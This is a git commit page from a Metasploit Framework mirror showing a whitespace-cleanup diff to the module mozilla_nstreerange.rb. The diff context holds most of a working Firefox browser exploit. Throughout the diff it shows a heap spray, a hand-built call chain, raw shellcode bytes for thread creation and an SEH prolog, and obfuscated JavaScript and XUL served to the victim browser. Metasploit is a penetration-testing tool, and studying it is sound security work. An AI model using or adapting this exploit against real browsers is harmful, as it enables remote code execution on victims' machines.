infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Remove extra tabs and spaces 

git-svn-id: file:///home/svn/framework3/trunk@13148 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Wei Chen 2011-07-10 21:10:45 +00:00
parent 9892eb39eb
commit 94aea207d3
1 changed files with 59 additions and 58 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

117
modules/exploits/windows/browser/mozilla_nstreerange.rb
View File

@ -121,14 +121,14 @@ class Metasploit3 < Msf::Exploit::Remote
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 2 2011'
))
register_options(
[
OptBool.new('SEHProlog', [ true, 'Whether to prepend the payload with an SEH prolog, to catch crashes and enable a silent exit', true]),
OptBool.new('CreateThread', [ true, 'Whether to execute the payload in a new thread', true]),
], self.class
)
register_advanced_options(
[
OptInt.new('BaseOffset', [ true, 'The offset we hope to have overwritten with our heap spray', 0x0F000000 ]),
@ -143,32 +143,36 @@ class Metasploit3 < Msf::Exploit::Remote
def prepare_payload(target, p)
base_offset = (datastore['Crash'] != true) ? datastore['BaseOffset'] : 1
spray_size = datastore['SpraySize']
esp_fix = 0
callchain = []
# Adding calls by hand is tedious, look at the bottom for an explanation of these values
add_call = Proc.new { |offset, arg1, arg2, direct |
next_offset = base_offset + (callchain.flatten.length*4)
callchain[-1][2] = next_offset if callchain.length > 0 # connect new frame to last one
if direct
callchain <<
[next_offset + 0x4 - 8,
callchain <<
[
next_offset + 0x4 - 8,
next_offset + 0x14,
0,
arg1,
arg2,
next_offset + 0x18 - 0x70,
offset]
offset
]
else
callchain <<
[next_offset + 0x4 - 8,
callchain <<
[
next_offset + 0x4 - 8,
next_offset + 0x14,
0,
arg1,
arg2,
offset - 0x70]
offset - 0x70
]
end
}
@ -178,37 +182,38 @@ class Metasploit3 < Msf::Exploit::Remote
callchain.flatten!
callchain[-1] = base_offset + (callchain.length*4) # patch last offset to point to shellcode located after callchain
esp_fix = 0x10
payload_buf = callchain.pack('V*')
payload_buf << "\xCC" if datastore['SetBP']
# make rest of shellcode run in separate thread
if datastore['CreateThread'] and target['LLOffset'] and target['GPAOffset']
payload_buf << "\x60\x31\xc0\x50\x50\x50\xe8\x00\x00\x00\x00\x5a\x89\xd6" +
"\x52\x83\x04\x24\x3b\x83\xc2\x25\x83\xc6\x2e\x50\x50\x56" +
"\x52\xff\x15#{[target['LLOffset']].pack('V')}\x50\xff\x15#{[target['GPAOffset']].pack('V')}" +
"\xff\xd0\x61\xc2#{[esp_fix].pack('v')}\x6b\x65\x72\x6e\x65\x6c\x33\x32" +
"\x00\x43\x72\x65\x61\x74\x65\x54\x68\x72\x65\x61\x64\x00"
payload_buf << "\x60\x31\xc0\x50\x50\x50\xe8\x00\x00\x00\x00\x5a\x89\xd6"
payload_buf << "\x52\x83\x04\x24\x3b\x83\xc2\x25\x83\xc6\x2e\x50\x50\x56"
payload_buf << "\x52\xff\x15#{[target['LLOffset']].pack('V')}\x50\xff\x15#{[target['GPAOffset']].pack('V')}"
payload_buf << "\xff\xd0\x61\xc2#{[esp_fix].pack('v')}\x6b\x65\x72\x6e\x65\x6c\x33\x32"
payload_buf << "\x00\x43\x72\x65\x61\x74\x65\x54\x68\x72\x65\x61\x64\x00"
esp_fix = 0
end
# encapsulate actual payload in SEH handler
if datastore['SEHProlog']
payload_buf << "\x60\xe8\x00\x00\x00\x00\x83\x04\x24\x1a\x64\xff\x35\x00" +
"\x00\x00\x00\x64\x89\x25\x00\x00\x00\x00\x81\xec\x00\x01" +
"\x00\x00\xeb\x12\x8b\x64\x24\x08\x64\x8f\x05\x00\x00\x00" +
"\x00\x83\xc4\x04\x61\xc2" + [esp_fix].pack('v')
payload_buf << "\x60\xe8\x00\x00\x00\x00\x83\x04\x24\x1a\x64\xff\x35\x00"
payload_buf << "\x00\x00\x00\x64\x89\x25\x00\x00\x00\x00\x81\xec\x00\x01"
payload_buf << "\x00\x00\xeb\x12\x8b\x64\x24\x08\x64\x8f\x05\x00\x00\x00"
payload_buf << "\x00\x83\xc4\x04\x61\xc2"
payload_buf << [esp_fix].pack('v')
end
payload_buf << p
# controlled crash, to return to our SEH handler
payload_buf << "\x33\xC0\xFF\xE0" if datastore['SEHProlog']
payload_buf
end
@ -221,12 +226,12 @@ class Metasploit3 < Msf::Exploit::Remote
redir << rand_text_alphanumeric(4+rand(4))
redir << '.html'
send_redirect(cli, redir)
elsif request.uri =~ /\.html?$/
print_status("#{self.refname}: Sending HTML to #{cli.peerhost}:#{cli.peerport}")
xul_name = rand_text_alpha(rand(100)+1)
j_applet = rand_text_alpha(rand(100)+1)
html = <<-EOS
<html>
#{"<applet codebase=\".\" code=\"#{j_applet}.class\" width=0 height=0></applet>" if target['UsesJava']}
@ -234,13 +239,13 @@ class Metasploit3 < Msf::Exploit::Remote
</html>
EOS
send_response(cli, html, { 'Content-Type' => 'text/html' })
elsif request.uri =~ /\.xul$/
print_status("#{self.refname}: Sending XUL to #{cli.peerhost}:#{cli.peerport}")
js_file = rand_text_alpha(rand(100)+1)
@js_func = rand_text_alpha(rand(32)+1)
xul = <<-EOS
<?xml version="1.0"?>
<?xml-stylesheet type="text/css"?>
@ -250,7 +255,7 @@ EOS
<treechildren>
<treeitem>
<treerow>
<treecell label=""/>
<treecell label=""/>
</treerow>
</treeitem>
</treechildren>
@ -258,72 +263,69 @@ EOS
</window>
EOS
send_response(cli, xul, { 'Content-Type' => 'application/vnd.mozilla.xul+xml' })
elsif request.uri =~ /\.js$/
print_status("#{self.refname}: Sending JS to #{cli.peerhost}:#{cli.peerport}")
return if ((p = regenerate_payload(cli).encoded) == nil)
base_offset = (datastore['Crash'] != true) ? datastore['BaseOffset'] : 1
spray_size = datastore['SpraySize']
spray_count = datastore['SprayCount']
if not target['Auto']
escaped_payload = Rex::Text.to_unescape(prepare_payload(target, p))
shellcode_str = "var shellcode = unescape(\"#{escaped_payload}\");"
else
shellcode_str = target['Targets'].map{|check, index|
shellcode_str = target['Targets'].map{ |check, index|
"if (#{check}) {\n var shellcode = unescape(\"#{Rex::Text.to_unescape(prepare_payload(targets[index], p))}\");\n }"}.join(' else ')
shellcode_str << " else { return; }"
end
escaped_addr = Rex::Text.to_unescape([base_offset].pack("V"))
custom_js = <<-EOS
function #{@js_func}() {
function #{@js_func}() {
container = new Array();
#{shellcode_str}
var delimiter = unescape("%udead");
var block = unescape("#{escaped_addr}");
while (block.length < 8)
block += block;
var treeSel = document.getElementById("tr").view.selection;
treeSel.clearSelection();
for (var count = 0; count < 30; ++count)
container.push(block + delimiter);
treeSel.select(0);
treeSel.tree = {
invalidateRange: function(s,e) {
treeSel.tree = null;
treeSel.clearSelection();
for (var count = 0; count < 10; ++count)
container.push(block + delimiter);
var big = unescape("%u4558%u4f52");
while (big.length < #{spray_size / 2})
big += big;
var pad = big.substring(0, #{(base_offset % spray_size)/2}) + shellcode;
var spray = pad + big.substring(pad.length + 2);
for (var count = 0; count < #{spray_count}; ++count)
container.push(spray + delimiter);
}
}
treeSel.invalidateSelection();
}
EOS
@ -332,10 +334,10 @@ EOS
'Variables' => %w{ shellcode container delimiter block treeSel big pad spray count }
}
}
send_response(cli, obfuscate_js(custom_js, opts), { 'Content-Type' => 'application/x-javascript' })
end
# Handle the payload
handler(cli)
end
@ -366,4 +368,3 @@ final call looks like this: CALL [[[[ESI]+8]]+70]
104924DD |. 5E POP ESI
104924DE \. C2 0400 RETN 4
=end